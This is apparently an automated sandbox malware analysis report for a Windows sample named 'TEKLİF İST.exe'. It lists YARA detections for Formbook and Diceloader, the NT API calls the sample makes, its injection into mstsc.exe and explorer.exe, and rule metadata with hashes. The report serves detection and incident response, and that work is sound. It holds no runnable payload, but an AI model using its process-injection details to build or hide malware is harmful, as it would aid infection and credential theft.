          Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1623721118.00000000011EF000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000006.00000002.2823254798.000000000DEC4000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: TEKL#U0130F #U0130ST.exe PID: 6148, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: TEKL#U0130F #U0130ST.exe PID: 4260, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: mstsc.exe PID: 3900, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_0041A330 NtCreateFile
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_0041A3E0 NtReadFile
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_0041A460 NtClose
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_0041A510 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_0041A3DB NtReadFile
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_0041A50F NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82BF0 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82B60 NtClose, LdrInitializeThunk
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82AD0 NtReadFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82DF0 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82DD0 NtDelayExecution, LdrInitializeThunk
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82D30 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82D10 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82CA0 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82C70 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82FB0 NtResumeThread, LdrInitializeThunk
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82F90 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82FE0 NtCreateFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82F30 NtCreateSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82EA0 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82E80 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B84340 NtSetContextThread
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B84650 NtSuspendThread
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82BA0 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82B80 NtQueryInformationFile
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82BE0 NtQueryValueKey
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82AB0 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82AF0 NtWriteFile
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82DB0 NtEnumerateKey
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82D00 NtSetInformationFile
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82CF0 NtOpenProcess
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82CC0 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82C00 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82C60 NtCreateKey
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82FA0 NtQuerySection
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82F60 NtCreateProcessEx
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82EE0 NtQueueApcThread
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B82E30 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B83090 NtSetValueKey
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B83010 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B835C0 NtCreateMutant
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B839B0 NtGetContextThread
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B83D10 NtOpenProcessToken
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B83D70 NtOpenThread
          Source: C:\Windows\explorer.exe | Code function: 6_2_0DEAC232 NtCreateFile
          Source: C:\Windows\explorer.exe | Code function: 6_2_0DEADE12 NtProtectVirtualMemory
          Source: C:\Windows\explorer.exe | Code function: 6_2_0DEADE0A NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_04BB2CA0 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_04BB2C70 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_04BB2C60 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_04BB2DF0 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_04BB2DD0 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_04BB2D10 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_04BB2EA0 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_04BB2FE0 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_04BB2F30 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_04BB2AD0 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_04BB2BF0 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_04BB2BE0 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_04BB2B60 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_04BB35C0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_04BB4650 NtSuspendThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_04BB4340 NtSetContextThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_04BB2CF0 NtOpenProcess
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: String function: 01B97E54 appears 102 times
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: String function: 01B85130 appears 58 times
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: String function: 01BCF290 appears 105 times
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: String function: 01BBEA12 appears 86 times
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: String function: 01B3B970 appears 278 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 04BEEA12 appears 34 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0079AE27 appears 37 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 00798010 appears 1004 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 007EE06D appears 31 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 00883E7C appears 305 times
          Source: TEKL#U0130F #U0130ST.exe, 00000000.00000002.1551226317.000000000124E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs TEKL#U0130F #U0130ST.exe
          Source: TEKL#U0130F #U0130ST.exe, 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F #U0130ST.exe
          Source: TEKL#U0130F #U0130ST.exe, 00000000.00000002.1561410656.0000000009080000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F #U0130ST.exe
          Source: TEKL#U0130F #U0130ST.exe, 00000000.00000002.1559881227.0000000007515000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE vs TEKL#U0130F #U0130ST.exe
          Source: TEKL#U0130F #U0130ST.exe, 00000000.00000000.1537507476.0000000000C98000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamerFP.exe^ vs TEKL#U0130F #U0130ST.exe
          Source: TEKL#U0130F #U0130ST.exe, 00000004.00000002.1625524944.00000000038C2000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs TEKL#U0130F #U0130ST.exe
          Source: TEKL#U0130F #U0130ST.exe, 00000004.00000002.1624146248.0000000001C3D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TEKL#U0130F #U0130ST.exe
          Source: TEKL#U0130F #U0130ST.exeBinary or memory string: OriginalFilenamerFP.exe^ vs TEKL#U0130F #U0130ST.exe
          Source: TEKL#U0130F #U0130ST.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1623721118.00000000011EF000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000006.00000002.2823254798.000000000DEC4000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
